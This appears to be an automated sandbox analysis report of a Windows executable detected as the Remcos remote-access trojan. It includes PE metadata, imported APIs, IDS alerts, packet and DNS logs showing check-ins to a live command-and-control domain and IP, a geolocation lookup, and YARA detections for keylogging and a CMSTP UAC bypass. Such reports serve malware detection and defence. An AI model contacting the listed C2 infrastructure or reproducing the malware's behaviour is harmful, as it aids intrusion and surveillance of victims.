                                            jmp 00007F1998FBE920h
                                            cmp dword ptr [ecx+74h], 0Eh
                                            jbe 00007F1998FBE8F4h
                                            xor eax, eax
                                            cmp dword ptr [ecx+000000E8h], esi
                                            setne al
                                            mov dword ptr [ebp-1Ch], eax

                                            Rich Headers

                                            Programming Language:
                                            • [ASM] VS2003 (.NET) build 3077
                                            • [ C ] VS2003 (.NET) build 3077
                                            • [ C ] VS2003 (.NET) SP1 build 6030
                                            • [C++] VS2003 (.NET) SP1 build 6030
                                            • [C++] VS2003 (.NET) build 3077
                                            • [RES] VS2003 (.NET) build 3077
                                            • [LNK] VS2003 (.NET) build 3077

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x12813c0x104.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e70000x116c18.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1112900x48.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000xdf0440xe00003190b08eda668a97a7c1703364eeb9f9False0.49050467354910715data6.632563800200495IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0xe10000x498700x4a0001da98542fc0d8b5b2b6e7680e262c44bFalse0.29902937605574326data5.497521367739488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x12b0000x1bbe940x1a4000b1b83c4f64d47d06ab7b984326ffaa1aFalse0.9792858305431548data7.9838719215032015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x2e70000x116c180x1170000cee996523a166b5f9cb7c14ed898703False0.5741644965277778data7.249997532227287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x2e74a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5236486486486487
                                            RT_ICON0x2e75d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.48118279569892475
                                            RT_ICON0x2e78b80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3951219512195122
                                            RT_ICON0x2e7f200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.43713872832369943
                                            RT_ICON0x2e84880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6398916967509025
                                            RT_ICON0x2e8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5298507462686567
                                            RT_ICON0x2e9bd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5682624113475178
                                            RT_ICON0x2ea0400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4872950819672131
                                            RT_ICON0x2ea9c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.39704502814258913
                                            RT_ICON0x2eba700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.34813278008298754
                                            RT_ICON0x2ee0180x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.2675366084081247
                                            RT_ICON0x2f22400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.2926524953789279
                                            RT_ICON0x2f76c80x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.2580933361362203
                                            RT_GROUP_ICON0x300b700xbcdataEnglishUnited States0.6329787234042553
                                            RT_DLGINCLUDE0x300c2c0x78436PC bitmap, Windows 3.x format, 62172 x 2 x 36, image size 492645, cbSize 492598, bits offset 540.761982387261012
                                            RT_ANIICON0x3790640xcd26PC bitmap, Windows 3.x format, 7428 x 2 x 48, image size 52883, cbSize 52518, bits offset 540.4269964583571347
                                            RT_ANIICON0x385d8c0x8fb3PC bitmap, Windows 3.x format, 4840 x 2 x 53, image size 37717, cbSize 36787, bits offset 540.3975045532389159
                                            RT_ANIICON0x38ed400xa9c1PC bitmap, Windows 3.x format, 6224 x 2 x 46, image size 44274, cbSize 43457, bits offset 540.3912143037945555
                                            RT_ANIICON0x3997040x349adPC bitmap, Windows 3.x format, 27386 x 2 x 44, image size 216267, cbSize 215469, bits offset 540.4752609424093489
                                            RT_ANIICON0x3ce0b40x2fb63PC bitmap, Windows 3.x format, 25264 x 2 x 45, image size 196298, cbSize 195427, bits offset 540.4726317243779007

                                            Imports

                                            DLLImport
                                            KERNEL32.DLLMoveFileA, GetFullPathNameA, GetCurrentDirectoryA, GetDriveTypeA, CreateDirectoryA, SetStdHandle, DeleteFileA, SetFilePointer, FlushFileBuffers, HeapReAlloc, GetSystemTimeAsFileTime, GetDateFormatA, GetTimeFormatA, GetStartupInfoA, HeapAlloc, HeapFree, RtlUnwind, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, SetHandleCount, InterlockedExchange, VirtualQuery, LCMapStringA, LCMapStringW, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, RaiseException, IsBadReadPtr, OutputDebugStringA, GetStdHandle, ExpandEnvironmentStringsA, WriteFile, ReadFile, GetTempFileNameA, TlsAlloc, TlsSetValue, TlsFree, TlsGetValue, GetSystemInfo, GetTempPathA, ExitProcess, FindFirstFileA, FindClose, CreateFileA, GetWindowsDirectoryA, SetCurrentDirectoryA, CopyFileA, GetFileAttributesA, GetFileType, CloseHandle, TerminateProcess, GetModuleFileNameA, SetEnvironmentVariableA, IsValidCodePage, GetCPInfo, Sleep, GetCurrentProcessId, GetEnvironmentVariableA, GetThreadLocale, GetLocaleInfoA, IsValidLocale, GetUserDefaultLCID, GetACP, HeapSize, GlobalFree, GlobalAlloc, GlobalUnlock, GlobalLock, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLocaleInfoW, DeleteCriticalSection, GetCommandLineA, SetErrorMode, GetVersionExA, FreeLibrary, LoadLibraryA, GetCurrentThreadId, SetLastError, RemoveDirectoryA, MoveFileExA, GetModuleHandleA, GetProcAddress, GetCurrentProcess, WideCharToMultiByte, SystemTimeToFileTime, FileTimeToLocalFileTime, lstrcmpA, lstrcpyW, LocalAlloc, FileTimeToSystemTime, GetTickCount, GetSystemDirectoryA, MultiByteToWideChar, GetLastError, FormatMessageA, LocalFree, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetUnhandledExceptionFilter, GetTimeZoneInformation, VirtualProtect, EnumSystemLocalesA, GetStringTypeA, GetStringTypeW, SetEndOfFile, IsBadCodePtr, GetOEMCP, CompareStringA, CompareStringW, QueryPerformanceCounter
                                            ADVAPI32.dllDeleteService, RegCreateKeyA, FreeSid, CheckTokenMembership, AllocateAndInitializeSid, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, CreateServiceA, RegCloseKey, RegDeleteKeyA, OpenSCManagerA, OpenServiceA, CloseServiceHandle, QueryServiceStatus, RegOpenKeyExA, ControlService, StartServiceA, RegQueryValueExA, RegSetValueExA
                                            COMCTL32.dllImageList_Add, ImageList_BeginDrag, ImageList_Create, ImageList_ReplaceIcon, ImageList_SetDragCursorImage, ImageList_DragLeave, ImageList_DragEnter, ImageList_DragMove, ImageList_EndDrag, ImageList_Destroy, ImageList_GetImageCount, ImageList_Draw, ImageList_GetIconSize
                                            comdlg32.dllPageSetupDlgA, PrintDlgA, ChooseFontA, ChooseColorA, GetSaveFileNameA, CommDlgExtendedError, GetOpenFileNameA
                                            CRYPT32.dllCertGetNameStringA, CryptDecodeObject, CryptMsgClose, CertCloseStore, CertVerifyTimeValidity, CertFindCertificateInStore, CryptMsgGetParam, CryptQueryObject, CertFreeCertificateContext
                                            GDI32.dllGetNearestPaletteIndex, CreatePalette, SetStretchBltMode, GetClipBox, ExtSelectClipRgn, ExtFloodFill, GetPixel, SetPixel, Polyline, PolyBezier, TextOutA, SetROP2, GetCharABCWidthsA, GetTextExtentExPointA, SetWindowOrgEx, SetViewportOrgEx, SetWindowExtEx, SetViewportExtEx, SetMapMode, GetBkColor, GetTextColor, Arc, CreatePatternBrush, Polygon, SetPolyFillMode, PolyPolygon, Rectangle, RoundRect, Ellipse, SetBrushOrgEx, MaskBlt, StretchBlt, StretchDIBits, RestoreDC, SaveDC, GetRgnBox, EqualRgn, PtInRegion, PatBlt, CreateICA, CreateDIBSection, GetDIBits, CreateDIBitmap, GetDIBColorTable, EnumFontFamiliesExA, GetEnhMetaFileA, CopyEnhMetaFileA, DeleteEnhMetaFile, SetAbortProc, StartDocA, EndDoc, StartPage, EndPage, CreateDCA, GetSystemPaletteEntries, CreateHatchBrush, MoveToEx, LineTo, ExtCreatePen, GetStockObject, CreateBitmap, CreateCompatibleBitmap, BitBlt, DeleteDC, CreateCompatibleDC, GetPaletteEntries, SetTextAlign, RectInRegion, CreateRectRgnIndirect, CombineRgn, SelectClipRgn, GetObjectA, CreateSolidBrush, CreatePen, SetBkMode, SetTextColor, SetBkColor, GetRegionData, ExtCreateRegion, OffsetRgn, ExcludeClipRect, CreateRectRgn, GetTextExtentPoint32A, SelectPalette, RealizePalette, GdiFlush, SelectObject, GetTextMetricsA, GetDeviceCaps, DeleteObject, Pie, CreateFontIndirectA
                                            ole32.dllOleUninitialize, OleInitialize, RegisterDragDrop, CoLockObjectExternal, RevokeDragDrop, OleSetClipboard, OleIsCurrentClipboard, OleFlushClipboard, ReleaseStgMedium, OleGetClipboard, CoCreateInstance
                                            OLEAUT32.dllSysAllocString, SysFreeString, SysStringLen
                                            SHELL32.dllSHGetPathFromIDListA, SHGetMalloc, ShellExecuteExA, ExtractIconExA, ExtractIconA, DragQueryFileA, DragFinish, DragQueryPoint, DragAcceptFiles, SHGetSpecialFolderLocation
                                            USER32.dllPostThreadMessageA, MessageBeep, SetTimer, KillTimer, ShowCursor, EnumDisplaySettingsA, ChangeDisplaySettingsA, SetClipboardData, RegisterClipboardFormatA, DrawStateA, DrawEdge, GetMenuStringA, DefMDIChildProcA, TranslateMDISysAccel, DefFrameProcA, GetMessagePos, MapWindowPoints, ChildWindowFromPoint, InsertMenuItemA, GetSubMenu, CreateMenu, AppendMenuA, InsertMenuA, RemoveMenu, CreatePopupMenu, SetMenuItemInfoA, UnionRect, GetWindowDC, ModifyMenuA, CheckMenuRadioItem, CheckMenuItem, GetMenuState, TranslateAcceleratorA, CreateAcceleratorTableA, DestroyAcceleratorTable, ValidateRect, GetMessageA, DrawIconEx, DrawFrameControl, GetWindowTextA, GetClassNameA, DestroyCursor, CreateIconIndirect, LoadImageA, DestroyIcon, GetIconInfo, LoadBitmapA, LoadIconA, LoadCursorA, MessageBoxA, DdeFreeStringHandle, BeginPaint, DrawIcon, EndPaint, SetMenu, PostMessageA, HideCaret, OpenClipboard, IsClipboardFormatAvailable, CloseClipboard, keybd_event, SetForegroundWindow, GetForegroundWindow, OffsetRect, DrawFocusRect, CopyRect, DrawTextA, CreateDialogIndirectParamA, RegisterClassA, UnregisterClassA, FlashWindow, SetWindowRgn, AdjustWindowRectEx, GetSystemMenu, EnableMenuItem, DrawMenuBar, GetDesktopWindow, IsIconic, GetDC, ReleaseDC, SendMessageA, PostQuitMessage, TranslateMessage, DispatchMessageA, PeekMessageA, DestroyMenu, IsZoomed, BringWindowToTop, GetDlgItem, CreateDialogParamA, InflateRect, GetUpdateRgn, GetSysColor, CreateWindowExA, SetWindowsHookExA, IsDialogMessageA, TrackPopupMenu, IsWindow, PtInRect, SetCursor, GetCapture, DestroyWindow, UnhookWindowsHookEx, UnregisterHotKey, RegisterHotKey, CallNextHookEx, GetActiveWindow, GetMenuItemCount, GetMenuItemInfoA, SystemParametersInfoA, GetMessageTime, GetWindow, DdeQueryStringA, DdeUninitialize, DdeFreeDataHandle, DdeGetData, DdeCreateDataHandle, DdeGetLastError, DdeInitializeA, DdeDisconnect, DdeClientTransaction, GetUpdateRect, DdeCreateStringHandleA, GetAsyncKeyState, GetSystemMetrics, GetKeyState, GetWindowRect, GetClientRect, FillRect, GetWindowLongA, SetWindowLongA, SetWindowPos, SetFocus, EnableWindow, ShowWindow, DdePostAdvise, DdeConnect, GetWindowTextLengthA, DdeNameService, SetCapture, ReleaseCapture, BeginDeferWindowPos, EndDeferWindowPos, InvalidateRect, SetWindowTextA, GetFocus, IsWindowEnabled, IsWindowVisible, CallWindowProcA, DefWindowProcA, DeferWindowPos, MoveWindow, ClientToScreen, ScreenToClient, UpdateWindow, RedrawWindow, SetParent, GetCursorPos, WindowFromPoint, GetParent, ScrollWindow, SetScrollInfo, GetScrollInfo, SetCursorPos
                                            WINTRUST.dllWinVerifyTrust
                                            WSOCK32.dllclosesocket, inet_addr, ntohs, WSAGetLastError, recvfrom, sendto, htons, bind, ioctlsocket, setsockopt, inet_ntoa, socket, WSAStartup

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-12-09T22:42:09.541641+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.549704181.131.217.24430201TCP
                                            2024-12-09T22:42:10.906189+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1181.131.217.24430201192.168.2.549704TCP
                                            2024-12-09T22:42:12.762647+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549707178.237.33.5080TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 9, 2024 22:42:09.420866966 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:09.540417910 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:09.540543079 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:09.541640997 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:09.660990000 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:10.906188965 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:10.908030033 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:11.027600050 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:11.143222094 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:11.194607019 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:11.369736910 CET4970780192.168.2.5178.237.33.50
                                            Dec 9, 2024 22:42:11.489306927 CET8049707178.237.33.50192.168.2.5
                                            Dec 9, 2024 22:42:11.489402056 CET4970780192.168.2.5178.237.33.50
                                            Dec 9, 2024 22:42:11.489861965 CET4970780192.168.2.5178.237.33.50
                                            Dec 9, 2024 22:42:11.609793901 CET8049707178.237.33.50192.168.2.5
                                            Dec 9, 2024 22:42:12.762583017 CET8049707178.237.33.50192.168.2.5
                                            Dec 9, 2024 22:42:12.762646914 CET4970780192.168.2.5178.237.33.50
                                            Dec 9, 2024 22:42:12.811506033 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:12.930792093 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:13.791745901 CET8049707178.237.33.50192.168.2.5
                                            Dec 9, 2024 22:42:13.791812897 CET4970780192.168.2.5178.237.33.50
                                            Dec 9, 2024 22:42:14.266426086 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:14.267865896 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:14.387175083 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:44.068172932 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:42:44.069478989 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:42:44.189424038 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:43:14.086321115 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:43:14.088033915 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:43:14.207384109 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:43:44.114494085 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:43:44.123960972 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:43:44.243971109 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:43:59.466826916 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:43:59.710438013 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:43:59.819334030 CET3020149704181.131.217.244192.168.2.5
                                            Dec 9, 2024 22:43:59.819804907 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:44:00.086797953 CET4970430201192.168.2.5181.131.217.244
                                            Dec 9, 2024 22:44:00.087157011 CET4970780192.168.2.5178.237.33.50

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 9, 2024 22:42:08.764693975 CET5889053192.168.2.51.1.1.1
                                            Dec 9, 2024 22:42:09.412091017 CET53588901.1.1.1192.168.2.5
                                            Dec 9, 2024 22:42:11.213816881 CET5548653192.168.2.51.1.1.1
                                            Dec 9, 2024 22:42:11.353635073 CET53554861.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 9, 2024 22:42:08.764693975 CET192.168.2.51.1.1.10x61d3Standard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                            Dec 9, 2024 22:42:11.213816881 CET192.168.2.51.1.1.10x13e6Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 9, 2024 22:42:09.412091017 CET1.1.1.1192.168.2.50x61d3No error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                            Dec 9, 2024 22:42:11.353635073 CET1.1.1.1192.168.2.50x13e6No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • geoplugin.net

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549707178.237.33.50806580C:\Users\user\Desktop\4wECQoBvYC.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 9, 2024 22:42:11.489861965 CET71OUTGET /json.gp HTTP/1.1
                                            Host: geoplugin.net
                                            Cache-Control: no-cache
                                            Dec 9, 2024 22:42:12.762583017 CET1171INHTTP/1.1 200 OK
                                            date: Mon, 09 Dec 2024 21:42:12 GMT
                                            server: Apache
                                            content-length: 963
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                            Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:16:41:52
                                            Start date:09/12/2024
                                            Path:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\4wECQoBvYC.exe"
                                            Imagebase:0x400000
                                            File size:4'087'808 bytes
                                            MD5 hash:472CD96B1B5771243C40C10CD034324E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:16:42:07
                                            Start date:09/12/2024
                                            Path:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\4wECQoBvYC.exe"
                                            Imagebase:0x400000
                                            File size:4'087'808 bytes
                                            MD5 hash:472CD96B1B5771243C40C10CD034324E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:16:43:58
                                            Start date:09/12/2024
                                            Path:C:\Windows\SysWOW64\wscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
                                            Imagebase:0xf0000
                                            File size:147'456 bytes
                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:0.1%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:4
                                              Total number of Limit Nodes:0
                                              execution_graph 11480 4bda53 11481 4bda5f __lock 11480->11481 11482 4bda6b GetVersionExA 11481->11482 11483 45daa5 11482->11483

                                              Executed Functions

                                              Function 004BDA53 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetVersionExA.KERNEL32(?,0050EEA0,00000060), ref: 004BDA73
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
